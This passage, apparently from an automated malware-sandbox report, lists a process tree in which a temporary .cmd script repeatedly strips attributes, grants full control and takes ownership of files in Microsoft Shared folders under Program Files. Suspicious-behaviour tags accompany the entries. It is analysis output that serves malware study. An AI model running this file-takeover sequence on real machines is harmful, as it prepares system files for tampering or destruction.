    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg" /E /G Admin:F /C
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg"
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg" /E /G Admin:F /C
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg"
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg""
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg"
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg" /E /G Admin:F /C
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1780
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg""
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg"
    3⤵
    PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg""
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg"
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg" /E /G Admin:F /C
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg""
  2⤵
  PID:656
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg"
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg" /E /G Admin:F /C
    3⤵
    PID:612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg""
  2⤵
  PID:1324
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg" /E /G Admin:F /C
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg""
  2⤵
  PID:1488
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg"
    3⤵
    - Views/modifies file attributes
    PID:1460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg" /E /G Admin:F /C
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg""
  2⤵
  PID:1040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg" /E /G Admin:F /C
    3⤵
    PID:388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg""
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg"
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg""
  2⤵
  PID:1776
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg"
    3⤵
    - Views/modifies file attributes
    PID:1332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg" /E /G Admin:F /C
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg"
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg""
  2⤵
  PID:1988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg"
    3⤵
    PID:332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg""
  2⤵
  PID:2040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg"
    3⤵
    - Drops file in Program Files directory
    PID:1112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg" /E /G Admin:F /C
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.jpg""
  2⤵
  PID:836
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.jpg"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.jpg" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg""
  2⤵
  PID:1460
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg" /E /G Admin:F /C
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg""
  2⤵
  PID:816
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg"
    3⤵
    - Views/modifies file attributes
    PID:1824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg""
  2⤵
  PID:1812
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg"
    3⤵
    PID:1216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg" /E /G Admin:F /C
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg""
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg"
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg" /E /G Admin:F /C
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.jpg""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.jpg"
    3⤵
    - Views/modifies file attributes
    PID:1904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.jpg" /E /G Admin:F /C
    3⤵
    PID:812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1908
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.jpg""
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.jpg"
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.jpg" /E /G Admin:F /C
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg""
  2⤵
  PID:332
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg" /E /G Admin:F /C
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\SoftBlue.jpg""
  2⤵
  PID:1112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\SoftBlue.jpg"
    3⤵
    PID:620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\SoftBlue.jpg" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\SoftBlue.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg""
  2⤵
  PID:1948
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg" /E /G Admin:F /C
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml""
  2⤵
  PID:1064
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml"
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml" /E /G Admin:F /C
    3⤵
    PID:788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui""
  2⤵
  PID:1820
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\tipresx.dll.mui""
  2⤵
  PID:1792
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\tipresx.dll.mui"
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\Content.xml""
  2⤵
  PID:1780
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\Content.xml"
    3⤵
    - Views/modifies file attributes
    PID:1692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\Content.xml" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\Content.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\tipresx.dll.mui""
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\tipresx.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\tipresx.dll.mui""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\tipresx.dll.mui"
    3⤵
    PID:904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\tipresx.dll.mui""
  2⤵
  PID:1976
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\tipresx.dll.mui"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\tipresx.dll.mui""
  2⤵
  PID:612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\tipresx.dll.mui"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi""
  2⤵
  PID:1324
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi" /E /G Admin:F /C
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi""
  2⤵
  PID:1536
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi"
    3⤵
    - Views/modifies file attributes
    PID:676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi" /E /G Admin:F /C
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
